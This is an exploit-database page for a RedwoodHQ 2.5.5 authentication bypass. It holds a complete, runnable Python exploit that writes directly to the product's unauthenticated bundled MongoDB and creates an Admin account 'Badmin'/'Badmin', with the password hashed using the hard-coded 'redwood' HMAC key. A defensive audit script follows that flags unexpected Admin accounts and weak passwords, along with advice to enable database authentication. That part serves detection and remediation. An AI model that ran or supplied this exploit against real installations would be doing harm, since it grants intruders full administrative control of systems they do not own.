"RedwoodHQ 2.5.5 - Authentication Bypass"

Author: EthicalHCOP

Platform: multiple

Release date: 2019-06-17

#!/usr/bin/python3
# -*- encoding: utf-8 -*-

# Exploit Title:   RedxploitHQ (Create Admin User by missing authentication on db)
# Date:            14-june-2019
# Exploit Author:  EthicalHCOP
# Version:         2.0 / 2.5.5
# Vendor Homepage: https://redwoodhq.com/
# Software Link:   https://redwoodhq.com/redwood-download/
# Tested on:       Ubuntu and Windows.
# Twitter:         @EthicalHcop
# Usage:           python3 RedxploitHQ.py -H mongo_host -P mongo_port
# Description:     Use RedxploitHQ to create a new Admin user in RedwoodHQ and get all the functions of the framework
#
# RedwoodHQ doesn't require MongoDB to be installed on the machine because the tool has its own Mongo launcher.
# The problem is that this vendor database doesn't require any authentication to read its data.
# So, I use the same syntax that the framework uses to create my admin user in the database and access the tool.
#
# POC:             https://youtu.be/MK9AvoJDtxY

import hashlib
import hmac
import optparse
from pymongo import MongoClient

def CreateHMAC(Pass):
    message = bytes(Pass,encoding='utf8')
    secret = bytes('redwood',encoding='utf8')
    hash = hmac.new(secret, message, hashlib.md5)
    return (hash.hexdigest())

def DbConnect(ip,port):
    uri = "mongodb://" + ip + ":" + port + "/"
    con = MongoClient(uri)
    return con

def DbDisconnect(con):
    con.close()

def CreateBadminUser(ip, port, user, passw):
    con = DbConnect(ip, port)
    db = con.automationframework
    usr = db.users
    passw = CreateHMAC(passw)
    data = {
        "name": user,
        "password": passw,
        "tag": [],
        "role": "Admin",
        "username": user,
        "status": ""
    }
    usr.insert_one(data)
    DbDisconnect(con)

def start():
    parser = optparse.OptionParser('usage %prog ' + \
                                   '-H host -P port')
    parser.add_option('-P', '--Port', dest='port', type='string', \
                      help='MongoDB Port')
    parser.add_option('-H', '--Host', dest='host', type='string', \
                      help='MongoDB Host')
    (options, args) = parser.parse_args()
    ip = options.host
    port = options.port
    if (str(ip) == "None"):
        print("Insert Host")
        exit(0)
    if (str(port) == "None"):
        port = "27017"
    try:
        CreateBadminUser(str(ip), str(port), 'Badmin', 'Badmin')
        print("[+] New user 'Badmin'/'Badmin' created.")
    except Exception as e:
        print("[-] Can't create the 'Badmin'/'Badmin' user. Error: "+str(e))

if __name__ == '__main__':
    start()
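
For defenders, an added example (not part of the original exploit and not RedwoodHQ code): an offline audit of user documents exported from the `automationframework.users` collection, using the document fields and the HMAC-MD5 scheme shown in the script above. The function names, the allow-list, the sample documents and the `Tester` role are constructed for illustration.

```python
import hashlib
import hmac


def redwood_hash(password: str) -> str:
    """Password hash as computed in the PoC above: HMAC-MD5 keyed with 'redwood'."""
    return hmac.new(b"redwood", password.encode("utf8"), hashlib.md5).hexdigest()


def audit_users(docs, expected_admins):
    """Return (username, finding) tuples for accounts that need review.

    docs            -- iterable of user documents (dicts) from the users collection
    expected_admins -- set of usernames that are supposed to hold the Admin role
    """
    findings = []
    for doc in docs:
        username = str(doc.get("username", ""))
        # An Admin account nobody provisioned is the direct trace of the issue
        # described on this page (a write to the unauthenticated database).
        if doc.get("role") == "Admin" and username not in expected_admins:
            findings.append((username, "unexpected Admin account"))
        # The static HMAC key lets an auditor test for trivially guessable
        # passwords, here the case where the password equals the username.
        stored = str(doc.get("password", ""))
        if hmac.compare_digest(stored, redwood_hash(username)):
            findings.append((username, "password equals username"))
    return findings


# Constructed sample documents, shaped like the record the PoC inserts.
SAMPLE_USERS = [
    {"name": "admin", "username": "admin", "role": "Admin",
     "password": redwood_hash("constructed-long-passphrase"), "tag": [], "status": ""},
    {"name": "qa1", "username": "qa1", "role": "Tester",
     "password": redwood_hash("another-constructed-pass"), "tag": [], "status": ""},
    {"name": "Badmin", "username": "Badmin", "role": "Admin",
     "password": redwood_hash("Badmin"), "tag": [], "status": ""},
]

if __name__ == "__main__":
    for user, finding in audit_users(SAMPLE_USERS, expected_admins={"admin"}):
        print(f"[!] {user}: {finding}")
```

The audit only finds accounts after the fact. The underlying fix is to enable authentication on the bundled MongoDB instance and keep its port unreachable from untrusted networks.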
Release Date Title Type Platform Author
2019-06-17 "RedwoodHQ 2.5.5 - Authentication Bypass" webapps multiple EthicalHCOP